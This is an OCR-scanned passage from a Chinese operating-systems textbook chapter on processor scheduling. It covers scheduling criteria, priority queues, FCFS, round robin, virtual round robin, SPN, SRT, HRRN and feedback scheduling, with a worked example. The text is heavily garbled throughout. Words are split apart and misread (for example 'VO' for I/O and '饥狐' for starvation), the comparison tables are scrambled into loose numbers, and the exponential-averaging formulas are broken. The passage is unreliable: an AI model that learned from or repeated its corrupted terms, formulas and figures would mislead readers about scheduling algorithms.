逝 展 现 给 用 户 一 贯 相同 的 特性 , 而 与 系统 执行 的 其 他 工作 无 关 。 在 某 种 程度 上 , 该 准则 也 是 可 以 
通过 计算 负载 函数 的 变化 量 来 度量 的 , 但 是 , 这 并 不 像 度量 吞吐 率 或 响应 时 间 关 于 工作 量 的 函数 
那么 直接 。 

表 9.2 总 结 了 几 种 重要 的 调度 准则 。 它们 是 互相 依赖 的 ,不 可 能 同时 使 它们 都 达到 最 优 。 例 
如 ,提供 较 好 的 响应 时 间 可 能 需要 调度 算法 在 进程 间 频 繁 地 切换 , 这 就 增加 了 系统 开销 ,降低 了 
吞吐 量 。 因 此 , 设计 一 个 调度 策略 涉及 在 互相 竞争 的 各 种 要 求 之 间 进 行 折 中 , 根据 系统 的 本 质 和 
使 用 情况 ， 给 各 种 要 求 设 定 相 应 的 权 值 。 


表 9.2 调度 准则 
面向 用 户 ， 与 性 能 相关 
周转 时 间 ” 指 一 个 进程 从 提交 到 完成 之 间 的 时 间 间 隔 ， 包 括 实 际 执行 时 间 加 上 等 待 资源 ( 包括 处 理 器 资源 ) 的 时 
间 。 对 批 处 理 作 业 而 言 ， 这 是 一 种 很 适宜 的 度量 
响应 时 间 ”对 一 个 交互 进程 ， 这 是 指 从 提交 -个 请 求 到 开始 接收 响应 之 间 的 时 间 间 隔 。 通 常 进程 在 处 理 该 请 求 的 
同时 ， 就 开始 给 用 户 产生 一 些 输出 。 因 此 从 用 户 的 角度 来 看 ， 相 对 于 周转 时 间 ， 这 是 一 种 更 好 的 度量 。 该 调度 原则 
应 该 试图 达到 较 低 的 响应 时 间 ， 并 且 在 响应 时 间 可 接受 的 范围 内 ， 使 得 可 以 交互 的 用 户 的 数目 达到 最 大 
最 后 期 限 ” 当 可 以 指定 进程 完成 的 最 后 期 限时 ， 调 度 原则 将 降低 其 他 目标 ,使 得 满足 最 后 期 限 的 作业 数目 的 百 分 
比 达到 最 大 





面向 用 户 ， 其 他 
可 预测 性 ”无论 系 统 的 负载 如 何 ， 一 个 给 定 的 工作 运行 的 总 时 间 量 和 总 代价 是 相同 的 。 用 户 不 希望 响应 时 间或 周转 
时 间 的 变化 太 大 。 这 可 能 需要 在 系统 工作 负载 大 范围 拌 动 时 发 出 信号 或 者 需要 系统 处 理 不 稳定 性 
面向 系统 ， 与 性 能 相关 
ELE ”调度 策略 应 该 试图 使 得 每 个 时 间 单 位 完成 的 进程 数目 达到 最 大 。 这 是 对 可 以 执行 多 少 工作 的 一 种 度量 。 
它 明 显 取 决 于 一 个 进程 的 平均 执行 长 度 ， 也 受 调 度 策略 的 影响 ， 调 度 策略 会 影响 利用 率 
处 理 器 利用 率 ”这 是 处 理 器 忙 的 时 间 百 分 比 。 对 昂贵 的 共享 系统 来 说 ， 这 是 一 个 重要 的 准则 。 在 单 用 户 系 统 和 一 
些 其 他 的 系统 (如 实时 系统 ) 中 ,该 准则 与 其 他 准则 相 比 显得 不 太 重 要 
面向 系统 ， 其 他 
公平 性 ”在 没有 来 自用 户 的 指导 或 其 他 系统 提供 的 指导 时 ， 进 程 应 该 被 平等 地 对 待 ， 没 有 一 个 进程 会 处 于 饥 狐 状态 
强制 优先 级 ” 当 进 程 被 指定 了 优先 级 后 ， 调 度 策略 应 该 优先 选择 高 优先 级 的 进程 
平衡 资源 ”调度 策略 将 保持 系统 中 所 有 资源 处 于 繁忙 状态 ， 较 少 使 用 紧缺 资源 的 进程 应 该 受到 照顾 。 该 准则 也 可 
用 于 中 程 调度 和 长 程 调度 


在 大 多 数 交 互 式 操作 系统 中 , 不 论 是 单 用 户 系 统 还 是 分 时 系统 , 适当 的 响应 时 间 是 关键 的 需 
求 。 由 于 这 个 需求 的 重要 性 , 并 且 由 于 各 个 应 用 对 “适当 ”的 定义 各 不 相同 ， 因 而 在 本 章 的 附录 
9A 中 将 继续 深入 讨论 该 主题 。 

9.2.2 ”优先 级 的 使 用 


在 许多 系统 中 ， 每 个 进程 都 被 指定 一 个 优先 级 ， 调 度 程序 总 是 选择 具有 较 高 优先 级 的 进程 。 
图 9.4 说 明了 优先 级 的 使 用 。 为 了 清楚 起 见 ， 队 列 图 被 简化 了 ,忽略 了 多 个 阻塞 队列 和 挂 起 状态 
的 存在 (与 图 3.8a 相 比 较 )。 不 是 提供 一 个 就 绪 队 列 ， 而 是 提供 了 一 组 队列 ， 按 优先 级 递减 的 顺 
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序 排列 : RQ0、RQ1、…、RQn， 其 中 对 所 有 的 i<j， 有 优先 级 [RQi]> 优 先 级 [RQi]S 当 进 行 一 次 
调度 选择 时 ,调度 程序 从 优先 级 最 高 的 队列 ( RQ0 ) 开始 。 如 果 该 队列 中 有 一 个 或 多 个 进程 ， 则 
使 用 某 种 调度 策略 选择 其 中 一 个 ; 如 果 RQ0 为 空 ， 则 检查 RQ1， 接 下 来 的 处 理 类 似 。 

纯粹 的 优先 级 调度 方案 的 一 个 问题 是 低 优 先 级 的 进程 可 能 会 长 时 间 处 于 饮 饿 状态 。 如 果 一 直 
有 高 优先 级 的 就 绪 进程 ， 就 会 发 生 这 种 情况 。 如 果 不 希 望 这 样 ， 一 个 进程 的 优先 级 应 该 随 着 它 的 
时 间或 执行 历史 而 变化 。 我 们 随后 会 给 出 一 个 例子 。 


事件 等 待 





阻塞 队列 
图 9.4 优先 级 排队 


Animation: Process Scheduling Algorithms 
9.2.3 选择 调度 策略 


表 9.3 给 出 了 关于 本 节 所 分 析 的 各 种 调度 策略 的 一 些 简要 信息 。 选 择 函 数 ( selection function ) 
确定 在 就 绪 进 程 中 选择 哪 一 个 进程 在 下 一 次 执行 。 这 个 函数 可 以 基于 优先 级 、 资 源 需 求 或 者 该 进 
程 的 执行 特性 。 对 于 最 后 一 种 情况 ， 下 面 的 三 个 量 是 非常 重要 的 : 
w: 到 现在 为 止 ， 在 系统 中 停留 的 时 间 。 
e: 到 现在 为 止 ， 花 费 的 执行 时 间 。 
s: 进程 所 需要 的 总 服务 时 间 ， 包括 e; 通常 ， 该 数量 必须 进行 估计 或 由 用 户 提供 。 
例如 ， 选 择 函 数 max[wj] 表 示 先 来 先 服务 〈 First-Come-First-Served, FCFS) 的 原则 。 
决策 模式 (decision mode ) 说 明 选 择 函 数 在 被 执行 的 瞬间 的 处 理 方式 , 通常 可 分 为 以 下 两 类 : 
o HS: 在 这 种 情况 下 ， 一旦 进程 处 于 运行 状态 ， 它 就 不 断 执行 直到 终止 ,或 者 因为 等 
待 VO 或 请 求 某 些 操 作 系统 服务 而 阻塞 自己 。 

o 抢占 : 当前 正在 运行 的 进程 可 能 被 操作 系统 中 断 ， 并 转移 到 就 绪 状 态 。 关 于 抢占 的 决策 
可 能 是 在 一 个 新 进程 到 达 时 ， 或 者 在 一 个 中 断 发 生 后 把 一 个 被 阻塞 的 进程 置 为 就 绪 状 态 
时 ,或 者 基于 周期 性 的 时 间 中 断 。 

与 非 抢 占 策略 相 比 , 抢占 策略 可 能 会 导致 较 大 的 开销 , 但 是 可 能 对 所 有 进程 会 提供 较 好 的 服 
Z, 因为 它们 避免 了 任何 一 个 进程 独占 处 理 器 太 长 的 时 间 。 此 外 , 通过 使 用 有 效 的 进程 切换 机 制 


© 在 UNIX 和 许多 其 他 系统 中 ， 优 先 级 数值 越 大 ， 表 示 的 进程 优先 级 就 越 低 ; 除非 特别 声明 ， 我 们 沿袭 这 个 悍 
例 。 某 些 系统 的 用 法 相反 ， 如 Windows， 大 数字 表示 高 优先 级 。 
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〈《 尽 可 能 地 获得 硬件 的 帮助 ), 以 及 提供 比较 大 的 内 存 , 使 得 大 部 分 程序 都 在 内 存 中 , 可 使 抢占 的 
代价 相对 比较 低 。 


表 9.3 各 种 调度 策略 的 特点 


选择 函数 决策 模式 Wa) Be Bt [a] 
max[w] 非 抢占 不 强调 
型 的 进程 不 利 


可 能 很 高 ， 特 
别 是 当 进 程 的 执 
常数 抢占 (在 时 如 果 时 间 片 小 ， 为 得 进程 提供 
间 片 用 完 时 ) | 吞吐 量 会 很 低 好 的 响应 时 间 
| 可 能 对 长 时 间 进 程 
min[s] (简称 长 进程 ) 不 | 可 能 
比较 高 
利 
抢占 (在 到 提供 好 的 响应 能 
对 长 ; 




























对 进程 的 影响 
对 短 时 间 进 程 
(简称 短 进程 ) 不 
Al; 对 LO 密集 






























为 短 进 程 提 供 
好 的 响应 时 间 




























HRRN 


行 时 间 差 别 很 大 
时 
可 
提供 好 的 响应 | 可 能 
A Al 4A 
max((wts)/s) 非 抢 占 高 时 间 很 好 的 平衡 
抢占 《在 时 可 能 可 能 对 WO 密 

参见 正文 ) KRI 不 强调 


w: 花费 的 等 待 时 间 ，e: 到 现在 为 止 ， 花费 的 执行 时 间 ，s: 进程 所 需要 的 总 服务 时 间 ， 包 括 e 


在 描述 各 种 调度 策略 时 , 使 用 了 图 9.4 中 的 进程 集合 作为 运行 实例 。 可 以 把 它们 想象 成 批 处 
理 作业 ， 服 务 时 间 是 所 需要 的 整个 执行 时 间 。 另 外 ， 我 们 也 可 以 把 这 些 看 做 是 正在 进行 的 进程 ， 
需要 以 重复 的 方式 轮流 使 用 处 理 器 和 IO。 对 后 一 种 情况 ， 服 务 时 间 表 示 一 个 周期 所 需要 的 处 理 
器 时 间 。 在 任何 一 种 情况 下 ， 根 据 排队 模型 ， 该 数量 对 应 于 服务 时 间 @ 。 

对 于 表 9.4 的 例子 ， 图 9.5 显示 了 一 个 周期 内 ， 每 种 策略 的 执行 模式 ， 同 时 图 9.5 还 给 出 了 
一 些 重要 结果 。 首 先 ， 每 个 进程 的 结束 时 间 是 确定 的 。 根 据 这 一 点 ， 可 以 确定 周转 时 间 。 根 据 排 
队 模 型 ， 周 转 时 间 就 是 驻 留 时 间 T, 或 这 一 项 在 系统 中 花费 的 总 时 间 ( 等 待 时 间 + 服 务 时 间 )。 
一 个 更 有 用 的 数字 是 归 一 化 周转 时 间 ( turnaround time), 它 是 周转 时 间 与 服务 时 间 的 比率 , 该 值 
表明 一 个 进程 的 相对 延迟 。 在 典型 情况 下 ， 进 程 的 执行 时 间 越 长 ， 可 以 容忍 的 延迟 时 间 就 越 长 。 
该 比率 可 能 的 最 小 值 为 1.0， 值 的 增加 对 应 于 服务 级 别 的 减少 。 





反馈 





表 9.4 进程 调度 示例 
到 达 时 间 服务 时 间 i 到 达 时 间 服务 时 间 





先 来 先 服务 

最 简单 的 策略 是 先 来 先 服务 ( FCFS )， 也 称 做 先进 先 出 〈 First-In-First-Out，FIFO ) 或 严格 
排队 方案 。 当 每 个 进程 就 绪 后 , 它 加 入 就 绪 队 列 。 当 前 正在 运行 的 进程 停止 执行 时 ， 选择 在 就 绪 
队列 中 存在 时 间 最 长 的 进程 运行 。 

FCFS 执行 长 进程 比 执行 短 进程 更 好 。 考 虑 下 面 的 例子 ( 基于 [ FINK88 ] 中 的 例子 ): 


O 有 关 排 队 模 型 的 内 容 请 参阅 附录 9B。 
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进 程 到 达 时 间 服务 了 时 间 ( Ts) 开始 时 间 结束 时 间 周转 时 间 (7,) T, /Ts 
0 1 0 1 1 1 


1 
2 1 101 102 100 100 
3 


平均 值 100 26 


进程 Y 的 归 一 化 周转 时 间 与 其 他 进程 相 比 显得 不 协调 : 它 在 系统 中 的 总 时 间 是 所 需要 的 处 理 时 
间 的 100 倍 。 当 一 个 短 进 程 紧 随 着 一 个 长 进程 之 后 到 达 时 会 发 生 这 种 情况 。 另 一 方面 ,即使 在 这 
个 极端 的 例子 中 ， 长 进程 也 没有 遭 到 冷遇 。 进 程 Z 的 周转 时 间 几 乎 是 Y 的 两 倍 ， 但 是 它 的 归 一 
化 等 待 时 间 低 于 2.0。 

FCFS 的 另 一 个 难点 是 相对 于 LO 密集 型 的 进程 ， 它 更 有 利于 处 理 器 密集 型 的 进程 。 考 虑 有 
一 组 进程 ， 其 中 有 一 个 进程 大 多 数 时 候 都 使 用 处 理 器 ( 处 理 器 密集 型 )， 还 有 许多 进程 大 多 数 时 
候 进 行 VO 操作 (IO 密集 型 )。 如 果 一 个 处 理 器 密集 型 的 进程 正在 运行 ， 则 所 有 VO 密集 型 的 进 
程 都 必须 等 待 。 有 一 些 进程 可 能 在 WO 队列 中 (阻塞 态 ), 但 是 当 处 理 器 密集 型 的 进程 正在 执行 
时 ,它们 可 能 移 回 就 绪 队 列 。 这 时 ， 大 多 数 或 所 有 WO 设备 都 可 能 是 空闲 的 ， 即 使 它们 可 能 还 有 
工作 要 做 ,在 当前 正在 运行 的 进程 离开 运行 状态 时 ,就绪 的 WO 密集 型 的 进程 迅速 地 通过 运行 态 ， 
又 阻塞 在 VO 事件 七 。 如 果 处 理 器 密集 型 的 进程 也 被 阻塞 了 ， 则 处 理 器 空闲 。 因 此 ，FCEFS 可 能 
导致 处 理 器 和 LO 设备 都 没有 得 到 充分 利用 。 | 

FCFS 自身 对 于 单 处 理 器 系统 并 不 是 很 有 吸引 力 的 选择 。 但 是 , 它 通常 与 优先 级 策略 相 结 合 ， 
以 提供 一 种 更 有 效 的 调度 方法 。 因 此 ,调度 程序 可 以 维护 许多 队列 ， 每 个 优先 级 一 个 队列 ， 每 个 
队列 中 的 调度 基于 先 来 先 服务 原则 。 在 后 面 讨论 反馈 调度 时 ， 可 以 看 到 这 类 系统 的 一 个 例子 。 


轮转 

为 了 减少 在 FCFS 策略 下 短 作 业 的 不 利 情况 ， 一 种 简单 的 方法 是 采用 基于 时 钟 的 抢占 策略 ， 
这 类 方法 中 , 最 简单 的 是 轮转 算法 。 以 一 个 周期 性 间隔 产生 时 钟 中 断 ， 当 中 断 发 生 时 ， 当 前 正在 
运行 的 进程 被 置 于 就 绪 队 列 中 ,然后 基于 FCFS 策略 选择 下 一 个 就 绪 作 业 和 运行。 这 种 技术 也 称 做 
时 间 片 〈time slicing )， 因 此 每 个 进程 在 被 抢占 前 都 给 定 一 片 时 间 。 

对 于 轮转 法 ,最 主要 的 设计 问题 是 使 用 的 时 间 段 ( 片 ) 的 长 度 。 如 果 这 个 长 度 非常 短 ， 则 短 
作业 会 相对 比较 快 地 通过 系统 。 另 一 方面 , 处 理 时 钟 中 断 、 执 行 调度 和 分 派 孙 数 都 需要 处 理 器 开 
销 。 因 此 , 应 该 避免 使 用 过 短 的 时 间 片 。 一 个 有 用 的 思想 是 时 间 片 最 好 略 大 于 一 次 典型 的 交互 所 
需要 的 时 间 。 如 果 小 于 这 个 时 间 ， 大 多 数 进程 都 需要 至 少 两 个 时 间 片 。 图 9.6 显示 了 时 间 片 长 短 
对 响应 时 间 的 影响 。 注意 ， 当 一 个 时 间 片 比 运行 时 间 最 长 的 进程 还 要 长 时 , 轮转 法 退化 成 FCFS。 

图 9.5 和 表 9.5 给 出 了 时 间 片 g 分 别 为 1 个 和 4 个 时 间 单 位 时 ， 前 面 例子 的 运行 结果 。 注 意 
当时 间 量 为 1 时， 进程 E (最 短 的 作业 ) 的 运行 情况 得 到 了 明显 的 改善 。 

轮转 法 在 通用 的 分 时 系统 或 事务 处 理 系统 中 都 特别 有 效 。 它 的 一 个 缺点 是 依赖 于 处 理 器 密集 
型 的 进程 和 IO 密集 型 的 进程 的 不 同 。 通 常 ，IO 密集 型 的 进程 比 处 理 器 密集 型 的 进程 使 用 处 理 
器 的 时 间 (花费 在 IO 操作 之 间 的 执行 时 间 ) 短 。 如 果 既 有 处 理 器 密集 型 的 进程 又 有 LO 密集 型 
的 进程 ， 就 有 可 能 发 生 如 下 情况 : 一 个 IO 密集 型 的 进程 只 使 用 处 理 器 很 短 的 一 段 时 间 , 然后 因 
为 VO 而 被 阻塞 ， 等 待 VO 操作 的 完成 ， 然 后 加 入 到 就 绪 队 列 ; 另 一 方面 ， 一 个 处 理 器 密集 型 的 
进程 在 执行 过 程 中 通常 使 用 一 个 完整 的 时 间 片 并 立即 返回 到 就 绪 队 列 中 。 因 此 , 处 理 器 密集 型 的 
进程 不 公平 地 使 用 了 大 部 分 处 理 器 时 间 ， 从 而 导致 WO 密集 型 的 进程 性 能 降低 、 使 用 IO 设备 低 
效 、 响 应 时 间 的 变化 大 。 
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调度 策略 的 比较 
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(FCFS) 


; 
术 
8 


最 短 进程 
优先 (SRN) 
i 
时 间 (SRT) 
最 短 响应 比 
反馈 
=1 
反馈 


qr 


平均 值 
8.60 
2.56 
10.80 
2.71 
10.00 
2.71 


20 
12 
6.00 
15 
3.50 
19 
li 
5.50 


18 
12 
2.40 
20 
14 
2.80 
20 
14 
2.80 


13 
2.25 
RR q=1 
17 
13 
3.25 
1.75 


FCFS 
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表 9.5 调度 策略 的 比较 





1.17 
18 
16 
2.67 
17 
15 
2.5 


图 9.5 


1.00 
3 
1.00 





/Ts 
周转 时 间 (T) 


T- /Ts 


到 达 时 间 
服务 时 间 (7J) 
周转 时 间 (70D 
周转 时 间 (T) 
T, /T; 
完成 时 间 


完成 时 间 
完成 时 间 


进程 

















〈 续 ) 
SPN . 

完成 时 间 3 9 15 20 11 

周转 时 间 (7) 3 7 11 14 3 7.60 

T, /T, 1.00 1.71 2.75 2.80 1.50 1.84 

SRT 

完成 时 间 3 15 8 20 10 

Fe 76 N15) (7,) 3 13 4 14 2 7.20 

T, [Ts 1.00 2.17 1.00 2.80 1.00 1.59 
HRRN 

完成 时 间 3 9 13 20 15 

周转 时 间 (77) 3 7 9 14 7 8.00 

T,/T, 1.00 1.17 2.25 2.80 3.5 2.14 
FB q=1 

完成 时 间 4 20 16 19 11 

周转 时 间 (77) 4 18 12 13 3 10.00 

T,/T, 1.33 3.00 3.00 2.60 1.5 2.29 
FB g=2! 

完成 时 间 4 17 18 20 14 

周转 时 间 (7D 4 15 14 14 6 10.60 

T, /T, 1.33 2.50 3.50 2.80 3.00 2.63 


[ HALD91 ] 提出 了 一 种 改进 了 的 轮转 法 ， 称 做 虚拟 轮转 法 ( Virtual Round Robin, VRR), 可 
以 避免 这 种 不 公平 性 , 图 9.7 描述 了 这 种 方法 。 新 进程 到 达 并 加 入 就 绪 队 列 , 是 基于 FCFS 管理 的 。 
当 一 个 正在 运行 的 进程 的 时 间 片 用 完了 , 它 返回 到 就 绪 队 列 。 当 一 个 进程 为 VO 而 被 阻塞 时 , 它 加 
人 到 一 个 VO 队列 。 到 此 为 止 , 一 切 都 没有 什么 不 同 之 处 。 它 的 新 特点 是 解除 了 IO 阻塞 的 进程 都 
被 转移 到 一 个 FCFS 辅助 队列 中 。 当 进行 一 次 调度 决策 时 , 辅助 队列 中 的 进程 优先 于 就 绪 队 列 中 的 
进程 。 当 一 个 进程 从 辅助 队列 中 调度 时 ， 它 的 运行 时 间 不 会 长 于 基本 时 间 段 减 去 它 上 一 次 从 就 绪 
队列 中 被 选择 运行 的 总 时 间 。 作 者 给 出 的 性 能 研究 表明 ， 这 种 方法 在 公平 性 方面 确实 优 于 轮转 法 。 


超时 


时 间 
分 配给 进程 

的 时 间 段 ”交互 结束 

RENE gs 


Sa 


时 间 段 辅助 队列 







9 
a) 时 间 段 大 于 典型 的 交互 时 间 


分 配给 进程 分 配给 进程 IO 2 
的 时 间 段 进程 被 抢占 的 时 间 段 交互 完成 发 生 


IO 2 队列 








4 一 一 一 
9 其 他 进程 运行 VOn 
s RE 


b 时 间 段 小 于 典型 的 交互 时 间 TOn 队列 


图 9.6 时间 片 大 小 的 影响 图 9.7 虚拟 轮转 调度 的 队列 图 
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最 短 进 程 优 先 

减少 FCFS 固有 的 对 长 进程 的 偏向 的 另 一 种 方法 是 最 短 进程 优先 ( Shortest Process. Next, 
SPN) 策略 。 这 是 一 个 非 抢占 的 策略 ， 其 原则 是 下 一 次 选择 预计 处 理 时 间 最 短 的 进程 。 因 此 , 短 
进程 将 会 越过 长 作业 ， 跳 到 队列 头 。 

«FA 9.5 和 表 9.5 显示 了 前 面 例子 的 运行 结果 。 注 意 进 程 BE 接受 服务 比 在 FCFS HR FER, 
如 果 关 注 响应 时 间 ， 整 体 性 能 也 有 显著 的 提高 。 但 是 ,响应 时 间 的 波动 也 增加 了 ， 特 别 是 对 长 进 
程 的 情况 。 因 此 ， 可 预测 性 降低 了 。 

SPN 策略 的 难点 在 于 需要 知道 或 至 少 需要 估计 每 个 进程 所 需要 的 处 理 时 间 。 对 于 批 处 理 作 
W, 系统 要 求 程序 员 估 计 该 值 , 并 提供 给 操作 系统 。 如 果 程 序 员 的 估计 远 低 于 实际 运行 时 间 ， 系 
统 就 可 能 终止 该 作业 。 在 生产 环境 中 ,相同 的 作业 频繁 地 运行 , 可 以 收集 关于 它们 的 统计 值 。 对 
交互 进程 ， 操 作 系统 可 以 为 每 个 进程 保留 一 个 运行 平均 值 ， 最 简单 的 计算 方法 如 下 : 


San = 了 (9.1) 


其 中 ， 

T: 该 进程 的 第 i 个 实例 的 处 理 器 执行 时 间 ( 对 批 作业 而 言 指 总 的 执行 时 间 ; 对 交互 作业 而 
言 指 处 理 器 一 次 短促 的 执行 时 间 )。 

S: 第 i 个 实例 的 预测 值 。 

Sy: 第 一 个 实例 的 预测 值 ， 非 计算 所 得 。 

为 避免 每 次 重新 计算 总 和 ， 可 以 把 上 式 重 写成 


Sintra ts, (9.2) 
n n 


注意 ， 该 公式 每 个 实例 的 权 值 相 同 。 在 典型 情况 下 ,我 们 希望 给 较 近 的 实例 较 大 的 权 值 ， 因 
为 它们 更 能 反映 出 将 来 的 行为 。 基 于 过 去 值 的 时 间 序 列 预测 将 来 值 的 一 种 更 常用 的 技术 是 指数 平 
均 法 : 
Snai = AT, +(1-@)S,, (9.3) 
其 中 , a 是 一 个 常数 加 权 因 子 (0<a<1), 用 于 确定 距 现 在 比较 近 或 比较 远 的 观测 数据 的 相对 权 值 。 
与 式 (9.2) 比较 。 通 过 使 用 一 个 与 过 去 的 观测 数据 量 无 关 的 常数 值 w， 我 们 考虑 了 过 去 所 有 的 值 ， 
观测 值 越 远 ， 具 有 的 权 值 越 小 。 为 了 更 清楚 地 看 到 这 一 点 ， 下 面 是 式 (9.3) 的 展开 式 : 
Sat = AT, +(1- @)QTy1 +--+ (1- A ATni +++ + (1-@)"S; (9.4) 
由 于 a 和 (1-a) 都 小 于 1， 因而 公式 中 越 靠 后 的 项 越 小 。 例 如 ， 对 w= 0.8， 式 (9.4) BR 
Sna = 0.87, +0.167, + 0.0327, 2 + 0.00647 3 +- 
观测 值 越 老 ， 它 计算 人 平均 值 的 部 分 越 小 。 
图 9.8 给 出 了 系数 的 大 小 关于 它 在 展开 式 
中 的 位 署 的 函数 。o 的 值 越 大 ， 给 较 近 观测 值 的 
权 值 就 越 大 。 当 w= 0.8 时 ， 几 乎 所 有 权 值 都 给 
了 最 近 的 4 个 观测 值 ， 而 如 果 w=0.2， 则 要 对 
最 近 8 个 左右 的 观测 值 计 算 平 均值 。 a 的 值 接近 
1 的 好 处 是 ,平均 值 能 够 迅速 反映 观测 值 的 快速 
变化 ， 缺 点 是 如 果 观 测 值 出 现 简短 的 波动 ， 将 
会 立即 影响 到 平均 值 ， 使 用 的 e 值 比较 大 会 导 
致 平均 值 的 急剧 变化 。 
9.9 比较 了 简单 的 平均 和 指数 平均 两 种 不 
lofi. ÆR 9.9a 中 ， 观 测 值 从 1 开始 ， 然 后 递 图 9.8 指数 平滑 系数 


系数 值 








观测 值 的 年 龄 
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增 到 10， 并 停留 在 那里 。 在 图 9.9% 中 ， 观 测 值 从 20 开始 ， 然 后 递减 到 10， 并 停留 在 那里 。 在 这 
两 种 情况 下 ， 我 们 都 从 估计 值 % = 一 0 开始 。 这 会 使 得 新 进程 有 更 高 的 优先 级 。 注 意 ， 指 数 平均 法 
比 简单 平均 法 能 够 更 快 地 跟踪 进程 行为 的 变化 , 并 且 a 的 值 越 大 , 对 观测 值 变化 的 反应 就 越 迅 速 。 

SPN 的 风险 在 于 只 要 持续 不 断 地 提供 更 短 的 进程 ， 长 进程 就 有 可 能 饥 钱 。 另 一 方面 ， 尽 管 
SPN 减少 了 对 长 作业 的 偏向 ， 但 是 由 于 缺少 抢占 机 制 ， 它 对 分 时 系统 或 事务 处 理 环境 仍然 不 理 
想 。 回 过 头 去 再 看 关于 FCFS 的 论述 中 对 最 坏 情况 的 分 析 ， 进 程 W、X、Y 和 2Z 仍然 按 同 样 的 顺 
序 执行 ， 因 而 严重 地 不 利于 短 进程 Y。 


10 20 


oO 


















pee 15 D 
R wo | NNa. Os, 
E 6 kay 
t Be 
m 簿 10 
Be 4 —e— 00.8 i 
z 一 oO- 一 00.5 = 

2 一 5- 一 简单 平均 = 5 

一 -4 一 观测 值 
0 0 4 A L l. ìi 1 1 L 
123 45 67 8 9101112131415 1617 181920 123 45 67 8 9101112131415 1617 18 1920 
时 间 时 间 
a) 递增 函数 b) 递减 函数 
图 9.9 使 用 指数 平均 法 

最 短 剩 余 时 间 


最 短 剩余 时 间 (Shortest Remaining Time, SRT) 是 针对 SPN 增加 了 抢占 机 制 的 版 本 。 在 这 
种 情况 下 ,调度 程序 总 是 选择 预期 剩余 时 间 最 短 的 进程 。 当 一 个 新 进程 加 入 到 就 绪 队 列 时 , 它 可 
能 比 当 前 运行 的 进程 具有 更 短 的 剩余 时 间 ， 因 此， 只 要 新 进程 就 绪 , 调度 程序 就 可 能 抢占 当前 正 
在 运行 的 进程 。 和 SPN 一 样 ， 调 度 程序 在 执行 选择 函数 时 必须 有 关于 处 理 时 间 的 估计 ， 并 且 存 
在 长 进程 饥饿 的 危险 。 

SRT 不 像 FCFS 那样 偏向 长 进程 ， 也 不 像 轮 转 那 样 会 产生 额外 的 中 断 ， 从 而 减少 了 开销 。 另 
一 方面 ， 它 必须 记录 过 去 的 服务 时 间 ， 从 而 增加 了 开销 。 从 周转 时 间 来 看 ，SRT 比 SPN 有 更 好 
的 性 能 ， 因 为 相对 于 一 个 正在 运行 的 长 作业 ， 短 作业 可 以 立即 被 选择 运行 。 

ER, CAF ( 如 表 9.5 所 示 ) 中 ， 三 个 最 短 的 进程 都 得 到 了 立即 服务 ， 归 一 化 的 周转 时 间 
均 为 1.0。 

最 高 响应 比 优先 

在 表 9.5 中 , 使 用 了 归 一 化 周转 时 间 ， 它 是 周转 时 间 和 实际 服务 时 间 的 比率 ， 可 作为 性 能 度 
量 。 对 每 个 单独 的 进程 ， 我 们 都 希望 该 值 最 小 ， 并 且 希 望 所 有 进程 的 平均 值 也 最 小 。 一 般 而 言 ， 
我 们 事先 并 不 知道 服务 时 间 是 多 少 , 但 可 以 基于 过 去 的 历史 或 用 户 和 配置 管理 员 的 某 些 输入 值 近 
似 地 估计 它 。 考 虑 下 面 的 比率 : 

_wts 


Ss 


其 中 ,RR 为 响应 比 。w 为 等 待 处 理 器 的 时 间 。s 为 预计 的 服务 时 间 。 

如 果 该 进程 被 立即 调度 ， 则 R 等 于 归 一 化 周转 时 间 。 注 意 ，R 的 最 小 值 为 1.0， 只 有 第 一 个 
进入 系统 的 进程 才能 达到 这 个 值 。 

因此 ， 调 度 规则 为 在 当前 进程 完成 或 被 阻塞 时 ， 选 择 R 值 最 大 的 就 绪 进 程 。 该 方法 非常 具 
有 吸引 力 ， 因 为 它 说 明 进 程 的 年 龄 。 当 偏向 短 作业 时 因为 小 分 母 产生 大 比值 )， 长 进程 由 于 得 


R 
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不 到 服务 的 时 间 不 断 地 增加 ， 从 而 增 大 了 比值 ， 最 终 在 竞争 中 胜 了 短 进程 。 

和 SRT、SPN 一 样 ， 使 用 最 高 响应 比 ( Highest Response Ratio Next，HRRN ) 策略 需要 估计 
的 服务 时 间 。 
反馈 

如 果 没 有 关于 各 个 进程 相对 长 度 的 任何 信息 ， 则 SPN, SRT 和 HRRN 都 不 能 使 用 。 另 一 种 
导致 偏向 短 作 业 的 方法 是 处 罚 运行 时 间 较 长 的 作业 ， 换 名 话说 ， 如 果 不 能 获得 剩余 的 执行 时 间 ， 
那 就 关注 已 经 执行 了 的 时 间 。 

方法 如 下 : 调度 基于 抢占 原则 (按时 间 片 ) 并 且 使 用 动态 优先 级 机 制 。 当 一 个 进程 第 一 次 进 
入 系统 中 时 ， 它 被 放置 在 RQ0， 如 图 9.4 所 示 。 当 它 第 一 次 被 抢占 后 并 返回 就 绪 状 态 时 ， 它 被 放 
EÉ RQ1。 在 随后 的 时 间 里 ， 每 当 它 被 抢占 时 ， 它 被 降级 到 下 一 个 低 优 先 级 队列 中 。 一 个 短 进 
程 很 快 会 执行 完 ， 不 会 在 就 绪 队列 中 降 很 多 级 。 一 个 长 进程 会 逐 级 下 降 。 因 此 , 新 到 的 进程 和 短 
进程 优先 于 老 进程 和 长 进程 。 在 每 个 队列 中 ， 除 了 在 优先 级 最 低 的 队列 中 之 外 ， 都 使 用 简单 的 
FCFS 机 制 。 一 旦 一 个 进程 处 于 优先 级 最 低 的 队列 中 ， 它 就 不 可 能 再 降低 ， 但 是 会 重复 地 返回 该 
队列 ， 直 到 运行 结束 。 因 此 ， 该 队列 可 按照 轮转 方式 调度 。 

图 9.10 通过 显示 一 个 进程 经 过 各 种 队列 的 路 径 来 说 明 反馈 调度 机 制 9 这 种 方法 称 做 多 级 反 
馈 , 表示 操作 系统 把 处 理 器 分 配给 一 个 进程 ， 当 这 个 进程 阻塞 或 被 抢占 时 , 就 反馈 到 多 个 优先 级 
队列 中 的 一 个 队列 中 。 


RQO 释放 


RQ! 





RQn - 释放 


图 9.10 反馈 调度 


这 个 方案 有 许多 变 体 。 一 个 简单 的 版 本 是 使 用 和 轮转 法 相同 的 方式 一 一 按照 周期 性 的 时 间 间 
隔 执 行 抢占 。 图 9.5 和 表 9.5 给 出 的 例子 说 明了 这 种 情况 ， 其 中 时 间 片 为 1 个 时 间 单 位 。 注 意 ， 
在 这 种 情况 下 ， 其 性 能 类 似 于 时 间 片 为 1 的 轮转 法 。 

